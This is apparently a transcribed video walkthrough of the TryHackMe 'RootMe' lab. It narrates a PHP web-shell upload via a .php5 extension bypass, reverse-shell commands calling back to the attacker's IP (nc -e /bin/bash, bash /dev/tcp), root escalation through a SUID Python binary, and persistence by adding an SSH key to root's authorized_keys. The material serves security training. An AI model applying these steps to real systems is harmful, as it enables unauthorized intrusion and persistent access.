Hey guys, welcome back. Hope you all are doing well. And today I'm going to solve a machine from Tryhackme. The machine name is Rootme, and the difficulty level of this machine is easy. But I'm going to cover this machine today because this is quite interesting for the beginners, and you will learn many things on this machine. The first thing, you have to actually bypass the file upload functionality, in which you can try many ways to bypass the file upload feature, extension bypass. Then after that you can actually upload the payload for the reverse shell directly, or you can get the web shell. Then you can go for the reverse shell as a user. Then you have to escalate your privileges to root. So without wasting time, as you can see, the IP of this target machine is 10.10.57.39, and the IP of my machine is 10.18.56 and 185. So let's go. Because to save the time, I already scan and save the result in default.nmap, so I'm not going to scan again. I'm just going to show you the ports open on this machine. So as you can see here, there are two ports open. One is port number 22. The service is SSH, and the SSH version is OpenSSH 7.6p1. And the second port is port number 80. This is TCP port and using Apache service, which is HTTPD 2.4.29. So there is no PHP session ID, HTTP only, flag not set, and yeah, that's it. Also, I actually created a record. So if I say grep rootme /etc/host, so you can see I already created a record with the IP address rootme.thm. So because port number 80 is open, so let's go and see what's running on port number 80. So http //rootme.thm, and this is the website. If I go to see the page source, so in the page source also there is nothing more interesting, just username root and the domain name rootme, or the machine name is rootme. Yeah, so fine, let's go and try something else. I'm going to use GoBuster. So GoBuster there for directory enumeration, space -z space -w. For the word list, user share word list, and dirbuster. Inside dirbuster there is directory 2.3 medium, and the URL. So for URL, space -u http://rootme.thm tryhackme/ and let's choose the thread. Number of thread I'm going to choose is 40, and just hit enter. Okay, so there are few things. Number one, /upload is there. So let's try what's inside /upload. Come here, uploads or upload, it's uploads. Yeah, so inside upload there is nothing, but maybe once we upload something it will come here. We can see that file here. Fine. And CSS is normal folder, JS is also normal folder, but this panel is quite interesting, seems interesting. So http /rootme.thm and panel, and yeah, so this is the panel from where you can upload the file. So I am just going to open up the burp suite, create a file. So desktop, rootme. Okay, come here. So clear. Next, start, close. So ls space -la. So if you go in users, share, and I think web shells, inside web shells you will go to php, php, yeah. So inside php there is one simple backdoor.php, and this is the php reverse shell and php backdoor.php. So let's see, just hit enter. Let's say copy and copy this file php reverse shell simple backdoor, paste it here, wait, yeah, paste it here and just paste like this. So now ls space -la and we have simple backdoor.php. So come back on the mouse pad and open and rootme, inside rootme simple backdoor.php. Another thing, I'm also going to create one simple text file. So let's say test.text, hit enter. This is a test file. Okay, save that. Now I don't need this because I already found this thing. Okay, now just because I already open up the burp suite, just go to the proxy, turn off intercept, go to the options and port number 8080, and here we just need to enable the burp proxy and come back here, root me, and first of all I'm going to just upload the text file and let's see what we will get. So here http history and let's say upload. So once we upload, you can see it's green, and this is I don't know which language is this, but successful means this is uploaded. Also it's green. Now if I go to see the request, this is the post request. So the content type is plain and text and the extension is text. This is file, submit, and then we got this. Let's now go back to the upload folder to see whether this file is in upload folder or not. So uploads, hit enter, and yeah, the file is in upload directory. So now let's try to upload the one thing I want to do here. Let's I want to change the name of simple backdoor to webshell.php, ls space -la and webshell.php. Now let's try to upload this file. So again, start the burp proxy, come here, webshell.php, and this is my burp suite, hit enter. So as you can see now, this time it's detecting the file extension which is PHP, and maybe it's saying PHP is not allowed. Okay, so now let's just analyze the request. This is the post request, and let's see. So this is application. First of all, I want to send this request to the repeater. Come back to the repeater, everything is okay. I just want to bypass this. So let's try few things, like suppose I'm gonna say jpg.jpg, and here I say image, and instead of xphp let's see jpeg. Fine, and let's try to send this file again. Okay, it seems 200 okay, but still it's success. It seems success. So let's just refresh this. No, not go to the uploads. and as you can see here, we got this file, but now it's expecting JPG, but I don't have the JPG. It's PHP. Hit enter, but it will not work because it will actually check the complete file name, which contains .jpg also. So this is bypassed, but will not work actually. Okay, let's do something else. Let's try nullbyte 00.jpg and send again. So once we send, it again seems uploaded, but let's try. So if I just take this out, hit enter, and will not work. Why? Because if we try to access this one, it's actually URL encoding this percentage value. So if I just control U and send it again, again seems to be success. Let's just refresh it, and this time it seems this one, right, the new one, and again it's making URL encoded and will not work. So now the thing is, these things are not working. What else we can do? So there are other file extensions also which we can use for PHP. Okay, let's say application x-php, and here we can again one more time we can try something like phtm. Let's send this request. It seems success. Come back here, just refresh the page, and again, okay, it's uploaded, but it's filtering something. It takes all the content as the text. So let's see, phtm, send again. Again it seems to be successful. phtm, same, refresh, same. So let's try something else. Let it xphp, and here let's try some other extensions for PHP. Let's say PHP 3 and send. So successful means it's uploaded. Come back here, it's showing here, and the same. Let's try PHP 5, send again, come back here. Let's try to directly access. Usage, yeah, this time that works, because if we try to read this file, you will see that there is a parameter. The parameter name is cmd. So if you want to execute any command, what you need to do is, after this file name, you need to use that parameter. So the parameter is cmd, and question mark cmd is equal to id. Hit enter, and as you can see, we are successfully able to execute the command through this web shell. Now fantastic, we got this one. Now what we can do, we can try to get the reverse shell. nc space hyphen nlvp, port number 9090, hit enter, start the listener so that we can get the reverse shell here. Come back here. Now for reverse shell, what we can Let's first test is netcat there or not. So netcat is there. So let's just try to get the reverse shell. So nc space -e space /bin/bash, then the IP address where you want to get the reverse shell. So my IP address ifconfig and tunnel 0. So my IP address is this. Copy, come back here, paste that address, and the port number is 9090. Hit enter. Will work or not? No, that does not work. Okay, let's try to put plus sign here and also here. Hit enter. No, will not work. Okay, what else we can try is bash space -i, then and /dev/tcp /IP address /port number, which is 9090, space 0 greater than and 1. Hit enter. Will not work. Okay, so let's try something else. If I capture this request and send it again, come to the burp suite, go to the proxy, and this is the request. Yeah, so what we need to do is we need to send it to the repeater first. Go to the repeater and just Control U, URL encode, send 200. Okay, but not work. Okay, let's try another thing. Reverse shell one liner. Oh no. Reverse shell one liner, pentest monkey, and yeah, we are using this one, but that doesn't work. So we also used this one, it also didn't work. Let's try to use this. So I'm going to make it copy, come back here, paste it here, and my IP is 10.18 5685 185, right? Yeah, and 9090, and yeah, hit enter. Okay, take this one, and instead of this, paste this payload, come back here, just make URL encode, and the IP address is 10.18.56.185, and the port number is 9090, and hit enter, and yeah, that works, and we got the reverse shell. So who am I? ID, I'm www data, and this is the ID. So which Python 3, so Python 3 is there. So Python 3 space -c, import the module, which is pty dot spawn inside, let's say /bin/bash. Hit enter and export term is equal to xterm. Clear. Fine. So now let's see how many users are there. Those can run bash. So grep bash /etc/passwd. So there are 2 users only. No, there are 3 users. Those can run bin bash. Test, rootme, and root. Fine. Cd where www ls space hyphen la, what's inside. So it has the user flag. So cat user dot text. So this is the user flag, and let's see what we perm u equal to s to greater than div slash null to see if there is something interesting. And there is something interesting. Okay, you can also run the same command to see not only the file with the path, also with the permissions, like this. So find space slash I want to see the permission. So the permission of SUID and 2 greater than div slash null, and pipe it with xargs args and ls space hyphen la. So now you can see all those files with the file path. There is a difference. There is only file path. Now here you can see the permissions also. So if you see closely, there is this one is very interesting. SUID bit set in the Python. So let's go to GTF obins. This is a very good resource. Come back here, go to this link and try to find out the Python. So let's see Python, and there are many things like shell, reverse shell, file upload, file download, file write, file read, library load, and SUID. Also you will find the sudo, but in our condition, in our scenario, there is SUID bit set. So we will go with this exploit, SUID bit set, and for this we will use this, because SUID bit is set. So we can execute the Python and we can import any module, and we can actually any module means here we are going to import the OS module so that we can execute the commands, right? So let's take this, copy, come back and clear. So slash user slash bin slash just paste that. So it will be more efficient if you give the complete path, user bin python space -c, and we are going to import the OS module. Then we are going to execute the OS command, and as you can see, we got another shell ID, and this ID is root. Who am I? I am root. Host name rootme. Fine. So pwd, in which directory I am. I am in var slash www. So cd slash root ls space -la, and you have the root.txt. So you can just simply cat root.txt. Also you can go with .ssh. So cd.ssh ls space -la. There is only authorized. You actually get the root shell, but you want to make SSH because this shell is not that much capable, and you have to face a lot of things. You cannot use tab, you cannot use the arrow keys, you cannot autocomplete things. So let's see what's inside the cat pwd where I am SSH. Okay, so cat authorized key, there is nothing. And here what I'm going to do is cd.ssh, okay, and cat id underscore rsa dot public key. So I'm going to copy my public key inside this authorized file. So echo, and then my public key, then close the double quotes, and then send it to the authorized key, this file. Paste, hit enter. Fine. Let's see now it's available in authorized key or not. So as you can see, we successfully paste or copy our IDRSA public key in the authorized file. Now if we want to take the access to this machine, we can simply, because SSH port was open, so SSH space -I, and actually cd.ssh clear, and SSH space -I, ID underscore RSA, and root at rootme.tryhackme. Hit enter. Yes, and as you can see, we logged in as rootme, means on this target machine. Now we don't need this here. As you can see, we are logged in as root. So ls space -la, everything. So now we are the whole sole authority. So that's it for this video. If you like the content, please like, subscribe and share. If you have any query, you can put your query in the comment section and I will try to reply as soon as possible. See you in the next video. Bye.